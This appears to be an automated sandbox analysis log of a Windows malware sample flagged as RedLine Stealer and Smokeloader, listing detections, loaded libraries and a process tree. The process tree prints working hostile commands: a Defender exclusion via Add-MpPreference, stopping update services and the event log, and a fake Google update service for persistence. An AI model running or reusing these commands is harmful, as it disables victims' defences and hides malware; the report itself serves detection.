Source: 00000000.00000002.2091006922.0000000002330000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000000.00000002.2091301864.0000000002490000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23

Source: b4s45TboUL.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: HIIDGCGCBF.exe.0.dr	Static PE information: Section: ZLIB complexity 0.9914508865747256
Source: HIIDGCGCBF.exe.0.dr	Static PE information: Section: ZLIB complexity 1.002233956133225
Source: HIIDGCGCBF.exe.0.dr	Static PE information: Section: ZLIB complexity 1.0413533834586466
Source: HIIDGCGCBF.exe.0.dr	Static PE information: Section: ZLIB complexity 1.5625
Source: HIIDGCGCBF.exe.0.dr	Static PE information: Section: ZLIB complexity 2.3333333333333335
Source: HIIDGCGCBF.exe.0.dr	Static PE information: Section: ZLIB complexity 1.030054644808743
Source: HIIDGCGCBF.exe.0.dr	Static PE information: Section: ZLIB complexity 1.1047619047619048
Source: HIIDGCGCBF.exe.0.dr	Static PE information: Section: .reloc ZLIB complexity 1.5
Source: chrome_131[1].exe.0.dr	Static PE information: Section: ZLIB complexity 0.9914508865747256
Source: chrome_131[1].exe.0.dr	Static PE information: Section: ZLIB complexity 1.002233956133225
Source: chrome_131[1].exe.0.dr	Static PE information: Section: ZLIB complexity 1.0413533834586466
Source: chrome_131[1].exe.0.dr	Static PE information: Section: ZLIB complexity 1.5625
Source: chrome_131[1].exe.0.dr	Static PE information: Section: ZLIB complexity 2.3333333333333335
Source: chrome_131[1].exe.0.dr	Static PE information: Section: ZLIB complexity 1.030054644808743
Source: chrome_131[1].exe.0.dr	Static PE information: Section: ZLIB complexity 1.1047619047619048
Source: chrome_131[1].exe.0.dr	Static PE information: Section: .reloc ZLIB complexity 1.5
Source: updater.exe.4.dr	Static PE information: Section: ZLIB complexity 0.9914508865747256
Source: updater.exe.4.dr	Static PE information: Section: ZLIB complexity 1.002233956133225
Source: updater.exe.4.dr	Static PE information: Section: ZLIB complexity 1.0413533834586466
Source: updater.exe.4.dr	Static PE information: Section: ZLIB complexity 1.5625
Source: updater.exe.4.dr	Static PE information: Section: ZLIB complexity 2.3333333333333335
Source: updater.exe.4.dr	Static PE information: Section: ZLIB complexity 1.030054644808743
Source: updater.exe.4.dr	Static PE information: Section: ZLIB complexity 1.1047619047619048
Source: updater.exe.4.dr	Static PE information: Section: .reloc ZLIB complexity 1.5

Source: classification engine

Classification label: mal100.troj.adwa.spyw.evad.winEXE@61/19@2/2

Source: C:\Users\user\Desktop\b4s45TboUL.exe

Code function: 0_2_00418810 CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle,

0_2_00418810

Source: C:\Users\user\Desktop\b4s45TboUL.exe

Code function: 0_2_00413970 CoCreateInstance,MultiByteToWideChar,lstrcpyn,

0_2_00413970

Source: C:\Users\user\Desktop\b4s45TboUL.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\IXQGYVFQ.htm

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1780:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2136:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2060:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1060:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7000:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7088:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4908:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7076:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7124:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1028:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3620:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1868:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1364:120:WilError_03
Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess6556
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5824:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6804:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5448:120:WilError_03

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_btz1cm3s.gov.ps1

Jump to behavior

Source: b4s45TboUL.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\b4s45TboUL.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\b4s45TboUL.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\ProgramData\HIIDGCGCBF.exe

File read: C:\Windows\System32\drivers\etc\hosts

Jump to behavior

Source: b4s45TboUL.exe, 00000000.00000002.2103193052.000000001AF68000.00000004.00000020.00020000.00000000.sdmp, b4s45TboUL.exe, 00000000.00000002.2106395343.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' \|\| %Q \|\| substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: b4s45TboUL.exe, 00000000.00000002.2103193052.000000001AF68000.00000004.00000020.00020000.00000000.sdmp, b4s45TboUL.exe, 00000000.00000002.2106395343.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
Source: b4s45TboUL.exe, 00000000.00000002.2103193052.000000001AF68000.00000004.00000020.00020000.00000000.sdmp, b4s45TboUL.exe, 00000000.00000002.2106395343.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
Source: b4s45TboUL.exe, 00000000.00000002.2103193052.000000001AF68000.00000004.00000020.00020000.00000000.sdmp, b4s45TboUL.exe, 00000000.00000002.2106395343.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
Source: b4s45TboUL.exe, 00000000.00000002.2103193052.000000001AF68000.00000004.00000020.00020000.00000000.sdmp, b4s45TboUL.exe, 00000000.00000002.2106395343.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
Source: b4s45TboUL.exe, 00000000.00000002.2103193052.000000001AF68000.00000004.00000020.00020000.00000000.sdmp, b4s45TboUL.exe, 00000000.00000002.2106395343.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE x(addr INT,opcode TEXT,p1 INT,p2 INT,p3 INT,p4 TEXT,p5 INT,comment TEXT,subprog TEXT,stmt HIDDEN);
Source: b4s45TboUL.exe, 00000000.00000002.2103193052.000000001AF68000.00000004.00000020.00020000.00000000.sdmp, b4s45TboUL.exe, 00000000.00000002.2106395343.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
Source: b4s45TboUL.exe, 00000000.00000003.1763912209.0000000020EE9000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: b4s45TboUL.exe, 00000000.00000002.2103193052.000000001AF68000.00000004.00000020.00020000.00000000.sdmp, b4s45TboUL.exe, 00000000.00000002.2106395343.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
Source: b4s45TboUL.exe, 00000000.00000002.2103193052.000000001AF68000.00000004.00000020.00020000.00000000.sdmp, b4s45TboUL.exe, 00000000.00000002.2106395343.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE x(type TEXT,schema TEXT,name TEXT,wr INT,subprog TEXT,stmt HIDDEN);

Source: b4s45TboUL.exe

ReversingLabs: Detection: 39%

Source: unknown	Process created: C:\Users\user\Desktop\b4s45TboUL.exe "C:\Users\user\Desktop\b4s45TboUL.exe"
Source: C:\Users\user\Desktop\b4s45TboUL.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\ProgramData\HIIDGCGCBF.exe"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\ProgramData\HIIDGCGCBF.exe "C:\ProgramData\HIIDGCGCBF.exe"
Source: C:\ProgramData\HIIDGCGCBF.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k WerSvcGroup
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 452 -p 6556 -ip 6556
Source: C:\Users\user\Desktop\b4s45TboUL.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6556 -s 2568
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Source: C:\ProgramData\HIIDGCGCBF.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
Source: C:\ProgramData\HIIDGCGCBF.exe	Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop UsoSvc
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\sc.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wusa.exe wusa /uninstall /kb:890830 /quiet /norestart
Source: C:\ProgramData\HIIDGCGCBF.exe	Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop WaaSMedicSvc
Source: C:\Windows\System32\sc.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\ProgramData\HIIDGCGCBF.exe	Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop wuauserv
Source: C:\Windows\System32\sc.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\ProgramData\HIIDGCGCBF.exe	Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop bits
Source: C:\Windows\System32\sc.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\ProgramData\HIIDGCGCBF.exe	Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop dosvc
Source: C:\Windows\System32\sc.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\ProgramData\HIIDGCGCBF.exe	Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
Source: C:\ProgramData\HIIDGCGCBF.exe	Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
Source: C:\Windows\System32\powercfg.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\ProgramData\HIIDGCGCBF.exe	Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
Source: C:\Windows\System32\powercfg.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\ProgramData\HIIDGCGCBF.exe	Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
Source: C:\Windows\System32\powercfg.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\powercfg.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\ProgramData\HIIDGCGCBF.exe	Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe delete "GoogleUpdateTaskMachineQC"
Source: C:\Windows\System32\sc.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\ProgramData\HIIDGCGCBF.exe	Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe create "GoogleUpdateTaskMachineQC" binpath= "C:\ProgramData\Google\Chrome\updater.exe" start= "auto"
Source: C:\Windows\System32\sc.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\ProgramData\HIIDGCGCBF.exe	Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop eventlog
Source: C:\ProgramData\HIIDGCGCBF.exe	Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe start "GoogleUpdateTaskMachineQC"
Source: C:\Windows\System32\sc.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\sc.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\ProgramData\Google\Chrome\updater.exe C:\ProgramData\Google\Chrome\updater.exe
Source: C:\Users\user\Desktop\b4s45TboUL.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\ProgramData\HIIDGCGCBF.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\ProgramData\HIIDGCGCBF.exe "C:\ProgramData\HIIDGCGCBF.exe"	Jump to behavior
Source: C:\ProgramData\HIIDGCGCBF.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force	Jump to behavior
Source: C:\ProgramData\HIIDGCGCBF.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart	Jump to behavior
Source: C:\ProgramData\HIIDGCGCBF.exe	Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop UsoSvc	Jump to behavior
Source: C:\ProgramData\HIIDGCGCBF.exe	Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop WaaSMedicSvc	Jump to behavior
Source: C:\ProgramData\HIIDGCGCBF.exe	Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop wuauserv	Jump to behavior
Source: C:\ProgramData\HIIDGCGCBF.exe	Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop bits	Jump to behavior
Source: C:\ProgramData\HIIDGCGCBF.exe	Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop dosvc	Jump to behavior
Source: C:\ProgramData\HIIDGCGCBF.exe	Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0	Jump to behavior
Source: C:\ProgramData\HIIDGCGCBF.exe	Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0	Jump to behavior
Source: C:\ProgramData\HIIDGCGCBF.exe	Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0	Jump to behavior
Source: C:\ProgramData\HIIDGCGCBF.exe	Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0	Jump to behavior
Source: C:\ProgramData\HIIDGCGCBF.exe	Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe delete "GoogleUpdateTaskMachineQC"	Jump to behavior
Source: C:\ProgramData\HIIDGCGCBF.exe	Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe create "GoogleUpdateTaskMachineQC" binpath= "C:\ProgramData\Google\Chrome\updater.exe" start= "auto"	Jump to behavior
Source: C:\ProgramData\HIIDGCGCBF.exe	Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop eventlog	Jump to behavior
Source: C:\ProgramData\HIIDGCGCBF.exe	Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe start "GoogleUpdateTaskMachineQC"	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 452 -p 6556 -ip 6556	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6556 -s 2568	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wusa.exe wusa /uninstall /kb:890830 /quiet /norestart	Jump to behavior

Source: C:\Users\user\Desktop\b4s45TboUL.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\b4s45TboUL.exe	Section loaded: msimg32.dll	Jump to behavior
Source: C:\Users\user\Desktop\b4s45TboUL.exe	Section loaded: msvcr100.dll	Jump to behavior
Source: C:\Users\user\Desktop\b4s45TboUL.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\b4s45TboUL.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\b4s45TboUL.exe	Section loaded: rstrtmgr.dll	Jump to behavior
Source: C:\Users\user\Desktop\b4s45TboUL.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\b4s45TboUL.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\b4s45TboUL.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\b4s45TboUL.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\b4s45TboUL.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\b4s45TboUL.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\b4s45TboUL.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\b4s45TboUL.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\b4s45TboUL.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\b4s45TboUL.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\b4s45TboUL.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\b4s45TboUL.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\b4s45TboUL.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\b4s45TboUL.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\b4s45TboUL.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\b4s45TboUL.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\b4s45TboUL.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\b4s45TboUL.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\b4s45TboUL.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\b4s45TboUL.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\Desktop\b4s45TboUL.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\b4s45TboUL.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\b4s45TboUL.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\b4s45TboUL.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Desktop\b4s45TboUL.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\Desktop\b4s45TboUL.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\b4s45TboUL.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\b4s45TboUL.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\b4s45TboUL.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\b4s45TboUL.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\Desktop\b4s45TboUL.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\b4s45TboUL.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\b4s45TboUL.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\b4s45TboUL.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\b4s45TboUL.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\b4s45TboUL.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\b4s45TboUL.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\b4s45TboUL.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\b4s45TboUL.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\b4s45TboUL.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\b4s45TboUL.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\b4s45TboUL.exe	Section loaded: pcacli.dll	Jump to behavior
Source: C:\Users\user\Desktop\b4s45TboUL.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\Desktop\b4s45TboUL.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\ProgramData\HIIDGCGCBF.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll	Jump to behavior
